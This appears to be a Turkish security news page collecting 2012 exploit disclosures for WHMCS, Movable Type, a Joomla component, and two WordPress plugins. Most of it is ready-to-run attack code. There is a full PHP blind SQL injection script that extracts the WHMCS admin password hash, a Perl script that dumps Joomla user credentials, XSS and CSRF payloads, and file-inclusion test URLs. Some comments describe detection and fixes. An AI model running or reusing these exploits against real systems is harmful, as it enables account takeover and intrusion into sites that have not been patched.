
WHMCS v4.5.2 Blind SQL Injection Vulnerability

WHMCS v4.5.2 için Blind SQL Injection açığı bulundu. Açığa ilişkin exploit aşağıdaki şekildedir. Birçok sunucuyu ilgilendiren bu açığın bir an önce kapatılması gerekir.

/ ___|| |_ __ _ _ __  __      ____ _ _ __ ___  
\___ \| __/ _` | '__| \ \ /\ / / _` | '__/ _ \ 
___) | || (_| | |     \ V  V / (_| | | |  __/ 
|____/ \__\__,_|_|      \_/\_/ \__,_|_|  \___| 
 
 
# Software : WHMCS (WHMCompleteSolution)                                              
# Google Dork: Turn on thinking mode 😛 
# Date: 10/22/2012 
# Author: Starware Security Team [www.Resecure.me] 
# Contact Us : Security[@]star-ware.com 
# Vendor Homepage: http://www.whmcs.com 
# Tested on: WHMCS v4.5.2  
# Affected versions: 4.5.x 
----------------------------------------------------- 
 
#Vulnerability Exists in : [SCRIPT_DIR]/modules/gateways/callback/googlecheckout.php 
 
#Vulnerable Source Code Snippet :  
 
LINE 11: $xml_response = (isset($HTTP_RAW_POST_DATA) ? $HTTP_RAW_POST_DATA : file_get_contents('php://input')); 
LINE 16: $xmldata = XMLtoArray($xml_response); 
LINE 19: $ordernumber = $xmldata['CHARGE-AMOUNT-NOTIFICATION']['GOOGLE-ORDER-NUMBER']; 
LINE 22: $query = 'SELECT data FROM tblgatewaylog WHERE gateway=\'Google Checkout\' AND data LIKE \'%new-order-notification%' . $ordernumber . '%\''; 
 
#Proof of Concept :  
 
<html>
<head>
<title>WHMCS Blind SQL Injection POC</title>
</head>
<body>
<!-- Browser-side proof of concept: POSTs a Google Checkout style notification whose
     google-order-number element ends in a caller-chosen suffix to the WHMCS callback handler
     and shows the response. The quoted callback snippet above reads the raw POST body and
     concatenates that element into a LIKE clause without any caller authentication shown,
     which is why the handler must parameterise the query (or strictly validate the order
     number format) before using it. -->
<script>
var params = "<charge-amount-notification><google-order-number>0' %YOUR INJECTION HERE% -- -</google-order-number><new-fulfillment-order-state>charge-amount-notification</new-fulfillment-order-state></charge-amount-notification>";
var http = new XMLHttpRequest();
// Legacy Firefox-only privilege API; where `netscape` is undefined the access throws a
// ReferenceError and the alert in the catch block fires instead.
try {
netscape.security.PrivilegeManager.enablePrivilege("UniversalBrowserRead");
} catch (e) {
alert("Permission UniversalBrowserRead denied.");
}
// Asynchronous cross-origin POST of the XML body; the response text is only readable when the
// page is served from the same origin, the server sends permissive CORS headers, or the
// privilege above was granted.
http.open("POST", "http://site.com/whmcs/modules/gateways/callback/googlecheckout.php", true);
http.onreadystatechange = handleResponse;
http.send(params);
// Fires on every state change; acts only once the request completed with HTTP 200.
function handleResponse() {

if(http.readyState == 4 && http.status == 200){
var response = http.responseText;
alert(response);
}
}
</script>
</body>
</html>
 
#Exploit Code  :  
 
 
<?php 
/* 
WHMCS Blind SQL Injection Exploit by Starware Security Team. 
Usage: php exploit.php URL seconds 
*/
 
// Lift PHP's script execution-time cap: the timing loops below issue many deliberately slow requests.
set_time_limit(0);
/**
 * Sends $post_data as the body of an HTTP POST to $url via cURL and returns the raw response
 * body, or false when curl_exec() fails (the callers in this file ignore the return value and
 * rely on request timing alone).
 *
 * @param string $url       request URL
 * @param string $post_data raw request body, handed to CURLOPT_POSTFIELDS unchanged
 * @param int    $follow    1 to follow redirects (CURLOPT_FOLLOWLOCATION), anything else not to
 * @return string|false
 *
 * Defender notes: certificate and hostname verification are disabled, and every request carries
 * the same dated browser fingerprint (Firefox 7.0.1 user agent, "Keep-Alive: 115" header), which
 * is unlikely to match what the genuine Google Checkout notification service sends. That makes a
 * cheap signature for WAF or access-log rules on the callback endpoint.
 */
function post_request($url,$post_data,$follow=0) {
$user_agent = 'Mozilla/5.0 (X11; Linux i686; rv:7.0.1) Gecko/20100101 Firefox/7.0.1';
$ch = curl_init();
$timeout = 1;           // seconds allowed for the TCP connect
$execution_timeout = 4; // hard cap on the whole transfer; measured durations saturate here
curl_setopt($ch, CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); // no certificate validation
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); // no hostname check
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // return the body instead of printing it
if($follow == 1) curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE );
curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
curl_setopt($ch, CURLOPT_HTTPHEADER,array('Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','Accept-Language: en-us,en;q=0.5','Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7','Keep-Alive: 115','Connection: keep-alive'));
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_TIMEOUT, $execution_timeout);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,$post_data);
$response = curl_exec($ch);
curl_close($ch);
return $response;
}
 
function start_time() {
    // Current wall-clock time as a float: seconds since the Unix epoch including the
    // fractional part. Same value as adding the two fields of microtime()'s string form.
    return microtime(true);
}
 
function end_time($start) {
    // Seconds elapsed since $start (a value produced by start_time()), rounded to the nearest
    // whole second and returned as a float.
    $elapsed = microtime(true) - $start;
    return round($elapsed);
}
 
 
// Time-based oracle for one character position: asks the server whether the ASCII code of
// character $num3 of the password column (tbladmins, id 1) lies in [$num, $num2], makes the
// server stall with BENCHMARK() when it does, and returns true when the round trip took at
// least $seconds. Reads globals $url and $seconds set by the argument parsing below.
// The measurement is wall-clock and capped by post_request's 4-second CURLOPT_TIMEOUT, so
// network jitter alone can yield a true result when $seconds is small.
// Defender notes: the payload travels inside the <google-order-number> element of the XML
// callback body and only works because the callback concatenates that value into a LIKE
// clause (quoted LINE 22 above); a prepared statement or strict validation of the order
// number format removes the oracle. Inline-comment padding (/**/) and BENCHMARK( inside a
// payment-gateway callback body are strong detection signals.
function check_ascii($num,$num2,$num3) {
global $url,$seconds;
$start= start_time();
$injection = "/**/AnD/**/if(ascii(substring((SeLEcT/**/password/**/FROM/**/tbladmins/**/whEre/**/id/**/=/**/1),$num3,1))/**/BETWEEN/**/$num/**/and/**/$num2,/**/BENCHMARK(999999,MD5(NOW()*NOW())),/**/0)/**/-- #";
post_request($url,"<charge-amount-notification><google-order-number>0' $injection </google-order-number><new-fulfillment-order-state>charge-amount-notification</new-fulfillment-order-state></charge-amount-notification>");
// Delay at or above the threshold is read as "condition true".
if(end_time($start) >= $seconds)  return true;  else return false;

}
 
 
// Resolves one character position once check_ascii has narrowed its range: for every candidate
// code $i in [$num, $num2] it sends the equality test for position $num3 and echoes chr($i)
// when the response was delayed by at least $seconds. The loop does not stop at a match, so a
// delayed response for more than one candidate prints more than one character for the same
// position. Reads globals $url and $seconds.
function inject($num,$num2,$num3) {

global $url,$seconds;
for($i=$num;$i<=$num2;$i++) {
$start= start_time();
$injection = "/**/AnD/**/if(ascii(substring((SeLEcT/**/password/**/FROM/**/tbladmins/**/whEre/**/id/**/=/**/1),$num3,1))/**/=/**/$i,/**/BENCHMARK(999999,MD5(NOW()*NOW())),/**/0)/**/-- #";
post_request($url,"<charge-amount-notification><google-order-number>0' $injection </google-order-number><new-fulfillment-order-state>charge-amount-notification</new-fulfillment-order-state></charge-amount-notification>");
// Same wall-clock threshold as check_ascii; output is flushed immediately so progress is visible.
if(end_time($start) >= $seconds) { echo  chr($i); flush(); }

}


}
 
// Walks the 32 characters of the hash (the prompt below labels it an MD5), first bucketing each
// position with check_ascii over ranges that together cover '0'-'9' and 'a'-'z', then resolving
// it with inject. The last two ranges overlap at 116 ('t'). Reads global $url.
// Defender notes: every position costs several deliberately slow requests, so a burst of POSTs
// to the callback URL whose server-side processing time clusters around the BENCHMARK delay is
// the behaviour to alert on.
function get_password() {
global $url;
for($i=1; $i<=32;$i++) {
if(check_ascii(48,52,$i))  { inject(48,52,$i); }
elseif(check_ascii(53,57,$i)) { inject(53,57,$i); }
elseif(check_ascii(97,101,$i)) { inject(97,101,$i); }
elseif(check_ascii(102,106,$i)) { inject(102,106,$i); }
elseif(check_ascii(107,111,$i)) { inject(107,111,$i); }
elseif(check_ascii(112,116,$i)) { inject(112,116,$i); }
elseif(check_ascii(116,122,$i)) { inject(116,122,$i); }
}
}
 
 
 
// Command-line entry point: argv[1] is the WHMCS base URL, argv[2] the delay threshold in
// seconds above which a response is counted as "condition true".
if ($argc < 3) {
print "Usage: php ".$argv[0]." URL seconds\r\nExample:\r\nphp ".$argv[0]." http://site.com/whmcs/ 1\r\n-----------------------------------------\r\n";
die;
}
// Target is the Google Checkout callback handler named in the advisory header. $seconds stays
// a string from argv and is compared numerically in check_ascii/inject.
$url = trim($argv[1])."/modules/gateways/callback/googlecheckout.php";
$seconds = trim($argv[2]);
echo "[~] Fetching password right now ... \n"; flush();
echo "    >> MD5 Password = "; flush();
get_password();
 
?> 
 
 
################################################################################# 
 
Note: to exploit this vulnerability the Google Checkout payment gateway
must be activated by an admin from the WHMCS admin panel
 
~ END OF Disclosure ~ 
 
Good Luck :) 
 
################################################################################# 
#   Starware is a company specialized in Hosting and Information Security field #
#   with list of high ranked sites including Mobile operators used our Hosting  # 
#                              and Security Services.                           # 
#                                                                               # 
#                            "Company Located in Egypt"                         #                         
#                                                                               #                          
#                             http://www.star-ware.com                          #       
#                                                                               # 
#################################################################################  

Movable Type Pro 5.13en Stored XSS Vulnerability

Movable Type Pro 5.13en Stored XSS açığı bulunmuş olup, açık hakkındaki açıklamalar şu şekildedir:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Source URL: http://www.cloudscan.me/2012/10/cve-2012-1503-movable-type-pro-513en.html

Keywords: CVE-2012-1503, Movable Type Pro 5.13en, Stored XSS,
JavaScript Injection, Vendor Unresponsive, Full Disclosure

Introduction

Movable Type (MT) started as one of the industry's first blogging platforms
and has developed into an industry-leading publishing platform which has
been used globally for more than 10 years. Movable Type makes it simple to
manage entire websites, start new blogs, and build an engaged community of
readers and customers.

Six Apart KK has assumed responsibility over all intellectual property and
business operations of Movable Type, as well as trademark rights of Six
Apart. The new Six Apart, a Japanese corporation formerly known as Six
Apart KK, currently develops, markets and supports Movable Type for a
global user base, and also operates the company's website
(www.sixapart.com). The application can be downloaded from URL
http://www.movabletype.com/download/.

Exploit

Our researchers discovered a persistent XSS vulnerability, allowing an
attacker to inject arbitrary script code into the comment section of any
existing Mt5.13en installation. The blog comment is moderated before being
published, which means an attacker can target the moderating admin
(employee) via JavaScript injection.

Exploit Code:

<a href=javascript:alert(document.cookie)>
X X X X X X X X X X X X X X X<br>
X X X X X X X X X X X X X X X<br>
X X X X CLICKME NOW!  X X X X<br>
X X X X X X X X X X X X X X X<br>
X X X X X X X X X X X X X X X</a>

Screenshot at URL
http://www.cloudscan.me/2012/10/cve-2012-1503-movable-type-pro-513en.html

Bug Metrics: CVSS 6.5

Timeline

March 2012 - Email PoC to Vendor via 
April 2012 - No Response from Vendor
May 2012 - Email PoC to Vendor via 
October 2012 - Full Disclosure

-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 10.2.0 (Build 2599)
Charset: utf-8

wsBVAwUBUIFqUXz+WcLIygj0AQhJ4Af8DaKXqSTGW30YeoLXeq0kUhqXQ0BicpW8
UZGCMMnlgct7DVh36GIxWc/60WXtuA8nuPqSm7eMKbIrMsvQXPhg9o8MB0LErh49
e7DY1rZ5hVpq1jVqEEQIyu2bxqS8epFR9/5CSUukGnTwaf4gTna8ZB5UZoRPhLI9
ih/OKS1L1WZeykUqZB6oSjkc4t3AeS6iYdXZMvkSrwSgnN6iUKBa3lSSzuEzEmfv
Qhuvb0R6YxNMQafHOr4IlNa/A2rgGBlhYB3P5/wXdAmcnjIhPC4qtH6ik52+NiKQ
3m5Jr3V2rXVhJRrRwj0ubC4PtfVjIC1YP/k4zY0gA7DOmHhZKk+7Iw==
=JXEo
-----END PGP SIGNATURE-----

Joomla Commedia Plugin SQL Injection

Joomla Commedia Plugin com_commedia (index.php, task parametresi) SQL Injection açığı bulunmuş olup, açığa ilişkin exploit aşağıdadır. Exploit ile tablolara ulaşılarak username ve password bilgileri çekilebilmekte, aktivasyon kodu istenerek admin paneline ulaşılabilmektedir.

 Exploit Title: Joomla commedia Remote Exploit

 dork: inurl:index.php?option=com_commedia
 
 Date: [18-10-2012]
 
 Author: Daniel Barragan "D4NB4R"
 
 Twitter: 
  
 Vendor: http://www.ecolora.org/
 
 Version: 3.1 (last update on Oct 7, 2012) and lowers
 
 License: Commercial and Non-Commercial, affects 2 versions

 Demo: http://www.ecolora.org/index.php/demo/commedia

 Download: http://ecolora.com/index.php/programmy/file/5-plagin-mp3browser-dlya-muzykalnykh-satov-na-joomla-15
  
 Tested on: [Linux(bt5)-Windows(7ultimate)]

 Especial greetz:  Pilot, _84kur10_, nav, dedalo, devboot, ksha, shine, p0fk, the_s41nt


Descripcion: 

Commedia - a component and content plugin that allows you to create a content table containing all of the MP3's that are present in any directory of your site, a FTP-server (folder, single path to ftp-file) or a HTTP(S)-server (DROPBOX, folder, single path to http-file or http-radio).
 

Exploit: 

#!/usr/bin/perl -w
# Interactive menu: prints a banner, asks which Joomla users-table prefix to try, and dispatches
# to the matching sub. No `use strict`; the `use` lines placed after the prints still work
# because `use` takes effect at compile time. $option keeps its trailing newline (no chomp), but
# the numeric `==` tests still match because numeric conversion stops at the newline.
    ########################################
    # Joomla Component (commedia) Remote SQL Exploit
    #----------------------------------------------------------------------------#
    ########################################
    print "\t\t\n\n";
print "\t\n";
print "\t            Daniel Barragan  D4NB4R                \n";
print "\t                                                   \n";
print "\t      Joomla com_commedia Remote Sql Exploit \n";
print "\t\n\n";
print "                   :::Opciones de prefijo tabla users:::\n\n";
print "    1.  jos_users  2.  jml_users  3.  muc_users  4.  sgj_users  \n\n\n";

use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;

print ":::Opcion::: ";
my $option=<STDIN>;
# Each branch is a separate sub that differs only in the table name it queries.
if ($option==1){&jos_users}
if ($option==2){&jml_users}
if ($option==3){&muc_users}
if ($option==4){&sgj_users}


sub jos_users {
# Reads the target base URL from STDIN, then requests
# index.php?option=com_commedia&format=raw&task=down&pid=59&id=<payload>, where the payload
# replaces the numeric-looking id with a UNION SELECT that wraps the username and password of
# $table between <user>..<user> and <pass>..<pass> markers (the 0x3c... literals are those tags
# hex-encoded), and prints whatever the regexes below extract from the response.
# Identical to jml_users, muc_users and sgj_users except for the value of $table.
# Defender notes: a non-integer `id` followed by "union all select" in a format=raw download
# request to com_commedia is the request-side signature, and <user>/<pass> markers in a
# response body are an exfiltration indicator; casting id to an integer or using a prepared
# statement in the component closes the hole.


print "\nIngrese el Sitio:[http://wwww.site.com/path/]: ";


chomp(my $target=<STDIN>);

    #the username column of joomla
    $user="username";
    #the password column of joomla
    $pass="password";
    #the users table of joomla
    $table="jos_users";
    $d4n="com_commedia&format";
    $parametro="down&pid=59&id";
    
    $b = LWP::UserAgent->new() or die "Could not initialize browser\n";
    $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
       $host = $target ."index.php?option=".$d4n."=raw&task=".$parametro."=999999.9 union all select (select concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,count(*),".$pass.",0x3c706173733e) from ".$table."),null--";
    $res = $b->request(HTTP::Request->new(GET=>$host));
    $answer = $res->content;
    
    if ($answer =~ /<user>(.*?)<user>/){
            print "\nLos Datos Extraidos son:\n";
      print "\n
     
* Admin User : $1";
     
    }
    
    if ($answer =~/<pass>(.*?)<pass>/){print "\n
     
* Admin Hash : $1\n\n";
     
    print "\t\t#   El Exploit aporto usuario y password   #\n\n";}
    else{print "\n[-] Exploit Failed, Intente manualmente...\n";}
}

sub jml_users {
# Same procedure as the other three subs with $table set to jml_users: reads the target base
# URL, sends a format=raw download request whose `id` carries a UNION SELECT wrapping username
# and password between hex-encoded <user>/<pass> markers, and prints what the regexes extract.
# Defender notes: a non-integer `id` with "union all select" in a com_commedia request is the
# signature; integer-casting id or a prepared statement in the component closes the hole.


print "\nIngrese el Sitio:[http://wwww.site.com/path/]: ";


chomp(my $target=<STDIN>);

    #the username column of joomla
    $user="username";
    #the password column of joomla
    $pass="password";
    #the users table of joomla
    $table="jml_users";
    $d4n="com_commedia&format";
    $parametro="down&pid=59&id";
    
    $b = LWP::UserAgent->new() or die "Could not initialize browser\n";
    $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
       $host = $target ."index.php?option=".$d4n."=raw&task=".$parametro."=999999.9 union all select (select concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,count(*),".$pass.",0x3c706173733e) from ".$table."),null--";
    $res = $b->request(HTTP::Request->new(GET=>$host));
    $answer = $res->content;
    
    if ($answer =~ /<user>(.*?)<user>/){
            print "\nLos Datos Extraidos son:\n";
      print "\n
     
* Admin User : $1";
     
    }
    
    if ($answer =~/<pass>(.*?)<pass>/){print "\n
     
* Admin Hash : $1\n\n";
     
    print "\t\t#   El Exploit aporto usuario y password   #\n\n";}
    else{print "\n[-] Exploit Failed, Intente manualmente...\n";}
}

sub muc_users {
# Same procedure as the other three subs with $table set to muc_users: reads the target base
# URL, sends a format=raw download request whose `id` carries a UNION SELECT wrapping username
# and password between hex-encoded <user>/<pass> markers, and prints what the regexes extract.
# Defender notes: a non-integer `id` with "union all select" in a com_commedia request is the
# signature; integer-casting id or a prepared statement in the component closes the hole.


print "\nIngrese el Sitio:[http://wwww.site.com/path/]: ";


chomp(my $target=<STDIN>);

    #the username column of joomla
    $user="username";
    #the password column of joomla
    $pass="password";
    #the users table of joomla
    $table="muc_users";
    $d4n="com_commedia&format";
    $parametro="down&pid=59&id";
    
    $b = LWP::UserAgent->new() or die "Could not initialize browser\n";
    $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
       $host = $target ."index.php?option=".$d4n."=raw&task=".$parametro."=999999.9 union all select (select concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,count(*),".$pass.",0x3c706173733e) from ".$table."),null--";
    $res = $b->request(HTTP::Request->new(GET=>$host));
    $answer = $res->content;
    
    if ($answer =~ /<user>(.*?)<user>/){
            print "\nLos Datos Extraidos son:\n";
      print "\n
     
* Admin User : $1";
     
    }
    
    if ($answer =~/<pass>(.*?)<pass>/){print "\n
     
* Admin Hash : $1\n\n";
     
    print "\t\t#   El Exploit aporto usuario y password   #\n\n";}
    else{print "\n[-] Exploit Failed, Intente manualmente...\n";}
}

sub sgj_users {
# Same procedure as the other three subs with $table set to sgj_users: reads the target base
# URL, sends a format=raw download request whose `id` carries a UNION SELECT wrapping username
# and password between hex-encoded <user>/<pass> markers, and prints what the regexes extract.
# Defender notes: a non-integer `id` with "union all select" in a com_commedia request is the
# signature; integer-casting id or a prepared statement in the component closes the hole.


print "\nIngrese el Sitio:[http://wwww.site.com/path/]: ";


chomp(my $target=<STDIN>);

    #the username column of joomla
    $user="username";
    #the password column of joomla
    $pass="password";
    #the users table of joomla
    $table="sgj_users";
    $d4n="com_commedia&format";
    $parametro="down&pid=59&id";
    
    $b = LWP::UserAgent->new() or die "Could not initialize browser\n";
    $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
       $host = $target ."index.php?option=".$d4n."=raw&task=".$parametro."=999999.9 union all select (select concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,count(*),".$pass.",0x3c706173733e) from ".$table."),null--";
    $res = $b->request(HTTP::Request->new(GET=>$host));
    $answer = $res->content;
    
    if ($answer =~ /<user>(.*?)<user>/){
            print "\nLos Datos Extraidos son:\n";
      print "\n
     
* Admin User : $1";
     
    }
    
    if ($answer =~/<pass>(.*?)<pass>/){print "\n
     
* Admin Hash : $1\n\n";
     
    print "\t\t#   El Exploit aporto usuario y password   #\n\n";}
    else{print "\n[-] Exploit Failed, Intente manualmente...\n";}
}

  
_____________________________________________________
Daniel Barragan "D4NB4R" 2012

           

White Label CMS v 1.5 CSRF w/ persistent XSS

White Label CMS v 1.5 için CSRF ve persistent XSS açıkları bulunmuş olup, açıkların oluştuğu yerler ve kullanımı şu şekildedir:

# Exploit Title: White Label CMS v 1.5 CSRF w/ persistent XSS
# Date: 21/10/2012
# Exploit Author: pcsjj
# Vendor Homepage: http://www.videousermanuals.com/white-label-cms/
# Version: 1.5
# Software Link: http://plugins.svn.wordpress.org/white-label-cms/branches/
# Downloads: 110,313
# CVE : CVE-2012-5387 (CSRF), CVE-2012-5388 (XSS)

<html>
<title>Download</title>
<body>
<!-- CSRF proof of concept: loading this page makes the visitor's browser issue a GET to the
     plugin's admin save action with the visitor's WordPress session cookies attached. The
     request carries no nonce, so the option is saved, and the value written into
     wlcms_o_developer_name contains script markup that is presumably rendered later without
     escaping (the stored XSS). Plugin-side mitigation: verify a nonce on the save action
     (check_admin_referer / wp_verify_nonce) and escape the option on output (esc_html /
     esc_attr). -->
<img src='http://[TARGET]/wordpress/wp-admin/admin.php?page=wlcms-plugin.php&action=save&wlcms_o_developer_name="><script>alert("fun")</script><div
"'>
</body>
</html>

WordPress Social Discussions Plugin 6.1.1 Multiple Vulnerabilities

WordPress Social Discussions Plugin 6.1.1 eklentisinde Remote File Include ve SQL Injection açıkları bulundu.

[waraxe-2012-SA#093] - Multiple Vulnerabilities in WordPress Social Discussions Plugin
======================================================================================

Author: Janek Vind "waraxe"
Date: 17. October 2012
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-93.html


Description of vulnerable target:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Enables Social Sharing of your blog posts to 30+ Social Networks. Plugin also
enables you to Automatically Publish or Self Publish your Blog Posts to 25+ 
Networks.

http://wordpress.org/extend/plugins/social-discussions/

Affected version: 6.1.1

###############################################################################
1. Remote File Inclusion in "social-discussions-networkpub_ajax.php"
###############################################################################

Reasons: Uninitialized variable "$HTTP_ENV_VARS"
Attack vectors: User-supplied parameter "HTTP_ENV_VARS"
Preconditions:
 1. register_globals=on
 2. register_long_arrays=off
 3. allow_url_include=on for RFI if PHP >= 5.2.0
 4. PHP must be < 5.3.4 for LFI null-byte attacks
 5. magic_quotes_gpc=off for LFI null-byte attacks
 
 
Php script "social-discussions-networkpub_ajax.php" line 2:
------------------------[ source code start ]----------------------------------
if (!function_exists('add_action')){
  ($GLOBALS['HTTP_ENV_VARS']['DOCUMENT_ROOT'] . "/wp-config.php");
------------------------[ source code end ]------------------------------------

We can see that the script expects the old-style array "HTTP_ENV_VARS" to be initialized
and to contain a "DOCUMENT_ROOT" entry. But it appears that if the PHP directive
"register_long_arrays=off" is set, then "HTTP_ENV_VARS" is uninitialized, and if at the
same time "register_globals=on", it is possible to fill that array with any
value, leading to the RFI (Remote File Inclusion) vulnerability.


Tests:

http://localhost/wp342/wp-content/plugins/social-discussions/social-discussions-networkpub_ajax.php?HTTP_ENV_VARS[DOCUMENT_ROOT]=http://php.net/?

http://localhost/wp342/wp-content/plugins/social-discussions/social-discussions-networkpub_ajax.php?HTTP_ENV_VARS[DOCUMENT_ROOT]=/proc/self/environ%00z


###############################################################################
2. Full Path Disclosure in multiple scripts
###############################################################################

Reasons: Direct request to php script triggers pathname leak in error message
Preconditions: PHP directive display_errors=on
Result: Information Exposure Through an Error Message

Tests:

http://localhost/wp342/wp-content/plugins/social-discussions/social-discussions-networkpub.php

Fatal error: Call to undefined function __() in
C:\apache_www\wp342\wp-content\plugins\social-discussions\social-discussions-networkpub.php on line 2

http://localhost/wp342/wp-content/plugins/social-discussions/social-discussions.php

Fatal error: Call to undefined function __() in
C:\apache_www\wp342\wp-content\plugins\social-discussions\social-discussions-networkpub.php on line 2

http://localhost/wp342/wp-content/plugins/social-discussions/social_discussions_service_names.php

Fatal error: Call to undefined function __() in
C:\apache_www\wp342\wp-content\plugins\social-discussions\social_discussions_service_names.php on line 3



Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Janek Vind "waraxe"

Waraxe forum:  http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
Random project: http://albumnow.com/
---------------------------------- [ EOF ] ------------------------------------